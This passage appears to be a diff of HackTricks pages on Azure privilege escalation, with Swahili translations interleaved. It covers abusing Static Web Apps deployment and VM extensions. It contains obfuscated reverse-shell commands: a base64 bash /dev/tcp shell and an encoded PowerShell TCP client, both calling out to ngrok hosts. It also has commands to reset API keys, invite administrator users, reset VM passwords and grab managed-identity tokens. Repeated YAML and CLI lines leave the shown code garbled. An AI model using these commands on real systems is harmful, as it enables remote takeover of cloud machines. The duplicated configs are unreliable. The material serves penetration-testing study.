"appLocation": "/",
"apiLocation": "",
"appArtifactLocation": "build"
},
"deploymentAuthPolicy": "GitHub",
"repositoryToken": "<github_token>" # az rest --method GET --url "https://management.azure.com/providers/Microsoft.Web/sourcecontrols?api-version=2024-04-01"
}
}'
```
Example Github Action to deploy the app:
Mfano wa Github Action ya kupeleka programu:
```yaml
name: Azure Static Web Apps CI/CD
on:
push:
branches:
- main
pull_request:
types: [opened, synchronize, reopened, closed]
branches:
- main
push:
branches:
- main
pull_request:
types: [opened, synchronize, reopened, closed]
branches:
- main
jobs:
build_and_deploy_job:
if: github.event_name == 'push' || (github.event_name == 'pull_request' && github.event.action != 'closed')
runs-on: ubuntu-latest
name: Build and Deploy Job
permissions:
id-token: write
contents: read
steps:
- uses: actions/checkout@v3
with:
submodules: true
lfs: false
- name: Install OIDC Client from Core Package
run: npm install @actions/core@1.6.0 @actions/http-client
- name: Get Id Token
uses: actions/github-script@v6
id: idtoken
with:
script: |
const coredemo = require('@actions/core')
return await coredemo.getIDToken()
result-encoding: string
- name: Build And Deploy
id: builddeploy
uses: Azure/static-web-apps-deploy@v1
with:
azure_static_web_apps_api_token: "12345cbb198a77a092ff885782a62a15d5aef5e3654cac1234509ab54547270704-4140ccee-e04f-424f-b4ca-3d4dd123459c00f0702071d12345" # A valid formatted token is needed although it won't be used for authentication
action: "upload"
###### Repository/Build Configurations - These values can be configured to match your app requirements. ######
# For more information regarding Static Web App workflow configurations, please visit: https://aka.ms/swaworkflowconfig
app_location: "/" # App source code path
api_location: "" # Api source code path - optional
output_location: "build" # Built app content directory - optional
github_id_token: ${{ steps.idtoken.outputs.result }}
###### End of Repository/Build Configurations ######
build_and_deploy_job:
if: github.event_name == 'push' || (github.event_name == 'pull_request' && github.event.action != 'closed')
runs-on: ubuntu-latest
name: Build and Deploy Job
permissions:
id-token: write
contents: read
steps:
- uses: actions/checkout@v3
with:
submodules: true
lfs: false
- name: Install OIDC Client from Core Package
run: npm install @actions/core@1.6.0 @actions/http-client
- name: Get Id Token
uses: actions/github-script@v6
id: idtoken
with:
script: |
const coredemo = require('@actions/core')
return await coredemo.getIDToken()
result-encoding: string
- name: Build And Deploy
id: builddeploy
uses: Azure/static-web-apps-deploy@v1
with:
azure_static_web_apps_api_token: "12345cbb198a77a092ff885782a62a15d5aef5e3654cac1234509ab54547270704-4140ccee-e04f-424f-b4ca-3d4dd123459c00f0702071d12345" # A valid formatted token is needed although it won't be used for authentication
action: "upload"
###### Repository/Build Configurations - These values can be configured to match your app requirements. ######
# For more information regarding Static Web App workflow configurations, please visit: https://aka.ms/swaworkflowconfig
app_location: "/" # App source code path
api_location: "" # Api source code path - optional
output_location: "build" # Built app content directory - optional
github_id_token: ${{ steps.idtoken.outputs.result }}
###### End of Repository/Build Configurations ######
close_pull_request_job:
if: github.event_name == 'pull_request' && github.event.action == 'closed'
runs-on: ubuntu-latest
name: Close Pull Request Job
steps:
- name: Close Pull Request
id: closepullrequest
uses: Azure/static-web-apps-deploy@v1
with:
action: "close"
close_pull_request_job:
if: github.event_name == 'pull_request' && github.event.action == 'closed'
runs-on: ubuntu-latest
name: Close Pull Request Job
steps:
- name: Close Pull Request
id: closepullrequest
uses: Azure/static-web-apps-deploy@v1
with:
action: "close"
```
### Microsoft.Web/staticSites/resetapikey/action
With this permision it's possible to **reset the API key of the static web app** potentially DoSing the workflows that automatically deploy the app.
Kwa ruhusa hii inawezekana **kurekebisha funguo za API za programu ya wavuti ya statiki** ambayo inaweza kusababisha DoS kwa michakato inayotunga programu kiotomatiki.
```bash
az rest --method POST \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/resetapikey?api-version=2019-08-01"
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/resetapikey?api-version=2019-08-01"
```
### Microsoft.Web/staticSites/createUserInvitation/action
This permission allows to **create an invitation to a user** to access protected paths inside a static web app ith a specific given role.
The login is located in a path such as `/.auth/login/github` for github or `/.auth/login/aad` for Entra ID and a user can be invited with the following command:
Ruhusa hii inaruhusu **kuunda mwaliko kwa mtumiaji** ili kufikia njia zilizo salama ndani ya programu ya wavuti ya static yenye jukumu maalum lililotolewa.
Kuingia kuna mahali kama `/.auth/login/github` kwa github au `/.auth/login/aad` kwa Entra ID na mtumiaji anaweza kualikwa kwa amri ifuatayo:
```bash
az staticwebapp users invite \
--authentication-provider Github # AAD, Facebook, GitHub, Google, Twitter \
--domain mango-beach-071d9340f.4.azurestaticapps.net # Domain of the app \
--invitation-expiration-in-hours 168 # 7 days is max \
--name my-first-static-web-app # Name of the app\
--roles "contributor,administrator" # Comma sepparated list of roles\
--user-details username # Github username in this case\
--resource-group Resource_Group_1 # Resource group of the app
--authentication-provider Github # AAD, Facebook, GitHub, Google, Twitter \
--domain mango-beach-071d9340f.4.azurestaticapps.net # Domain of the app \
--invitation-expiration-in-hours 168 # 7 days is max \
--name my-first-static-web-app # Name of the app\
--roles "contributor,administrator" # Comma sepparated list of roles\
--user-details username # Github username in this case\
--resource-group Resource_Group_1 # Resource group of the app
```
### Pull Requests
By default Pull Requests from a branch in the same repo will be automatically compiled and build in a staging environment. This could be abused by an attacker with write access over the repo but without being able to bypass branch protections of the production branch (usually `main`) to **deploy a malicious version of the app** in the statagging URL.
Kwa default, Pull Requests kutoka tawi katika repo hiyo hiyo zitakusanywa na kujengwa kiotomatiki katika mazingira ya staging. Hii inaweza kutumiwa vibaya na mshambuliaji mwenye ufikiaji wa kuandika kwenye repo lakini bila uwezo wa kupita ulinzi wa tawi la uzalishaji (kawaida `main`) ili **kupeleka toleo la uharibifu la programu** katika URL ya stagging.
The staging URL has this format: `https://<app-subdomain>-<PR-num>.<region>.<res-of-app-domain>` like: `https://ambitious-plant-0f764e00f-2.eastus2.4.azurestaticapps.net`
URL ya staging ina muundo huu: `https://<app-subdomain>-<PR-num>.<region>.<res-of-app-domain>` kama: `https://ambitious-plant-0f764e00f-2.eastus2.4.azurestaticapps.net`
> [!TIP]
> Note that by default external PRs won't run workflows unless they have merged at least 1 PR into the repository. An attacker could send a valid PR to the repo and **then send a malicious PR** to the repo to deploy the malicious app in the stagging environment. HOWEVER, there is an unexpected protection, the default Github Action to deploy into the static web app need access to the secret containing the deployment token (like `secrets.AZURE_STATIC_WEB_APPS_API_TOKEN_AMBITIOUS_PLANT_0F764E00F`) eve if the deployment is done with the IDToken. This means that because an external PR won't have access to this secret and an external PR cannot change the Workflow to place here an arbitrary token without a PR getting accepted, **this attack won't really work**.
> Kumbuka kwamba kwa default PR za nje hazitakimbia workflows isipokuwa zimeunganishwa angalau PR 1 katika hifadhi. Mshambuliaji anaweza kutuma PR halali kwenye repo na **kisha kutuma PR ya uharibifu** kwenye repo ili kupeleka programu ya uharibifu katika mazingira ya stagging. HATA HIVYO, kuna ulinzi usiotarajiwa, Github Action ya default ya kupeleka kwenye static web app inahitaji ufikiaji wa siri inayoshikilia token ya kupeleka (kama `secrets.AZURE_STATIC_WEB_APPS_API_TOKEN_AMBITIOUS_PLANT_0F764E00F`) hata kama kupeleka kunafanywa kwa IDToken. Hii inamaanisha kwamba kwa sababu PR ya nje haina ufikiaji wa siri hii na PR ya nje haiwezi kubadilisha Workflow kuweka hapa token isiyo ya kawaida bila PR kukubaliwa, **shambulio hili halitafanya kazi kweli**.
{{#include ../../../banners/hacktricks-training.md}}

36
src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md
View File

@@ -34,7 +34,7 @@ az vm extension set \
--settings '{}' \
--protected-settings '{"commandToExecute": "nohup echo YmFzaCAtaSAgPiYgL2Rldi90Y3AvMi50Y3AuZXUubmdyb2suaW8vMTMyMTUgMD4mMQ== | base64 -d | bash &"}'
```
- Teua skripti iliyo kwenye mtandao
- Tekeleza script iliyoko mtandaoni
```bash
az vm extension set \
--resource-group rsc-group> \
@@ -65,7 +65,7 @@ az vm extension set \
--protected-settings '{"commandToExecute": "powershell.exe -EncodedCommand JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANwAuAHQAYwBwAC4AZQB1AC4AbgBnAHIAbwBrAC4AaQBvACIALAAxADkAMQA1ADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="}'
```
- Tekelea shell ya kinyume kutoka kwa faili
- Tekeleza shell ya kurudi kutoka kwa faili
```bash
az vm extension set \
--resource-group <rsc-group> \
@@ -87,13 +87,13 @@ Set-AzVMAccessExtension -ResourceGroupName "<rsc-group>" -VMName "<vm-name>" -Na
{{#endtab }}
{{#endtabs }}
Pia inawezekana kutumia nyongeza zinazojulikana vizuri kutekeleza msimbo au kufanya vitendo vya kibali ndani ya VMs:
Pia inawezekana kutumia nyongeza maarufu kutekeleza msimbo au kufanya vitendo vya kibali ndani ya VMs:
<details>
<summary>VMAccess extension</summary>
Nyongeza hii inaruhusu kubadilisha nenosiri (au kuunda ikiwa halipo) la watumiaji ndani ya Windows VMs.
Nyongeza hii inaruhusu kubadilisha nenosiri (au kuunda ikiwa halipo) la watumiaji ndani ya VMs za Windows.
```bash
# Run VMAccess extension to reset the password
$cred=Get-Credential # Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the password
@@ -105,7 +105,7 @@ Set-AzVMAccessExtension -ResourceGroupName "<rsc-group>" -VMName "<vm-name>" -Na
<summary>DesiredConfigurationState (DSC)</summary>
Hii ni **VM extensio**n inayomilikiwa na Microsoft inayotumia PowerShell DSC kusimamia usanidi wa Azure Windows VMs. Hivyo, inaweza kutumika **kutekeleza amri zisizo na mipaka** katika Windows VMs kupitia nyongeza hii:
Hii ni **VM extensio**n inayomilikiwa na Microsoft inayotumia PowerShell DSC kusimamia usanidi wa Azure Windows VMs. Hivyo, inaweza kutumika **kutekeleza amri za kawaida** katika Windows VMs kupitia nyongeza hii:
```bash
# Content of revShell.ps1
Configuration RevShellConfig {
@@ -308,9 +308,9 @@ Ruhusa hii inamruhusu mtumiaji **kuingia kama mtumiaji kwenye VM kupitia SSH au
Ingia kupitia **SSH** kwa **`az ssh vm --name <vm-name> --resource-group <rsc-group>`** na kupitia **RDP** kwa **akidi zako za kawaida za Azure**.
## `Microsoft.Resources/deployments/write`, `Microsoft.Network/virtualNetworks/write`, `Microsoft.Network/networkSecurityGroups/write`, `Microsoft.Network/networkSecurityGroups/join/action`, `Microsoft.Network/publicIPAddresses/write`, `Microsoft.Network/publicIPAddresses/join/action`, `Microsoft.Network/networkInterfaces/write`, `Microsoft.Compute/virtualMachines/write, Microsoft.Network/virtualNetworks/subnets/join/action`, `Microsoft.Network/networkInterfaces/join/action`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`
### `Microsoft.Resources/deployments/write`, `Microsoft.Network/virtualNetworks/write`, `Microsoft.Network/networkSecurityGroups/write`, `Microsoft.Network/networkSecurityGroups/join/action`, `Microsoft.Network/publicIPAddresses/write`, `Microsoft.Network/publicIPAddresses/join/action`, `Microsoft.Network/networkInterfaces/write`, `Microsoft.Compute/virtualMachines/write, Microsoft.Network/virtualNetworks/subnets/join/action`, `Microsoft.Network/networkInterfaces/join/action`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`
Hizi zote ni ruhusa muhimu za **kuunda VM yenye utambulisho maalum wa kusimamiwa** na kuacha **bandari wazi** (22 katika kesi hii). Hii inamruhusu mtumiaji kuunda VM na kuungana nayo na **kuchukua token za utambulisho wa kusimamiwa** ili kupandisha mamlaka kwake.
Hizi zote ni ruhusa muhimu za **kuunda VM yenye utambulisho maalum wa usimamizi** na kuacha **bandari wazi** (22 katika kesi hii). Hii inamruhusu mtumiaji kuunda VM na kuungana nayo na **kuchukua token za utambulisho wa usimamizi** ili kupandisha mamlaka kwake.
Kulingana na hali, ruhusa zaidi au chache zinaweza kuhitajika ili kutumia mbinu hii.
```bash
@@ -327,7 +327,7 @@ az vm create \
```
### `Microsoft.Compute/virtualMachines/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`
Hizi ruhusa zinatosha **kuteua utambulisho mpya wa usimamizi kwa VM**. Kumbuka kwamba VM inaweza kuwa na utambulisho kadhaa wa usimamizi. Inaweza kuwa na **ule wa mfumo**, na **utambulisho mwingi wa usimamizi wa mtumiaji**.\
Ruhusa hizo zinatosha **kuteua utambulisho mpya wa usimamizi kwa VM**. Kumbuka kwamba VM inaweza kuwa na utambulisho kadhaa wa usimamizi. Inaweza kuwa na **ule wa mfumo**, na **utambulisho mwingi wa usimamizi wa mtumiaji**.\
Kisha, kutoka kwa huduma ya metadata inawezekana kuzalisha tokeni kwa kila mmoja.
```bash
# Get currently assigned managed identities to the VM
@@ -343,13 +343,13 @@ az vm identity assign \
/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity1 \
/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity2
```
Kisha mshambuliaji anahitaji kuwa **amevunjika somehow VM** ili kuiba tokeni kutoka kwa utambulisho wa usimamizi uliotolewa. Angalia **maelezo zaidi katika**:
Kisha mshambuliaji anahitaji kuwa **amevunjika somehow VM** ili kuiba tokeni kutoka kwa vitambulisho vilivyotolewa. Angalia **maelezo zaidi katika**:
{{#ref}}
https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html#azure-vm
{{#endref}}
### "Microsoft.Compute/virtualMachines/read","Microsoft.Compute/virtualMachines/write","Microsoft.Compute/virtualMachines/extensions/read","Microsoft.Compute/virtualMachines/extensions/write"
### Microsoft.Compute/virtualMachines/read, Microsoft.Compute/virtualMachines/write, Microsoft.Compute/virtualMachines/extensions/read, Microsoft.Compute/virtualMachines/extensions/write
Ruhusa hizi zinaruhusu kubadilisha mtumiaji wa mashine ya virtual na nenosiri ili kuweza kuipata:
```bash
@@ -359,6 +359,22 @@ az vm user update \
--username <USERNAME> \
--password <NEW_PASSWORD>
```
### Microsoft.Compute/virtualMachines/write, "Microsoft.Compute/virtualMachines/read", "Microsoft.Compute/disks/read", "Microsoft.Network/networkInterfaces/read", "Microsoft.Network/networkInterfaces/join/action", "Microsoft.Compute/disks/write".
Hizi ruhusa zinakuwezesha kusimamia, diski, na interfaces za mtandao, na, zinakuwezesha kuunganisha diski kwenye mashine ya virtual.
```bash
# Update the disk's network access policy
az disk update \
--name <disk-name> \
--resource-group <resource-group-name> \
--network-access-policy AllowAll
# Attach the disk to a virtual machine
az vm disk attach \
--vm-name <vm-name> \
--resource-group <resource-group-name> \
--name <disk-name>
```
### TODO: Microsoft.Compute/virtualMachines/WACloginAsAdmin/action
Kulingana na [**docs**](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/compute#microsoftcompute), ruhusa hii inakuwezesha kudhibiti OS ya rasilimali yako kupitia Windows Admin Center kama msimamizi. Hivyo inaonekana hii inatoa ufikiaji wa WAC kudhibiti VMs...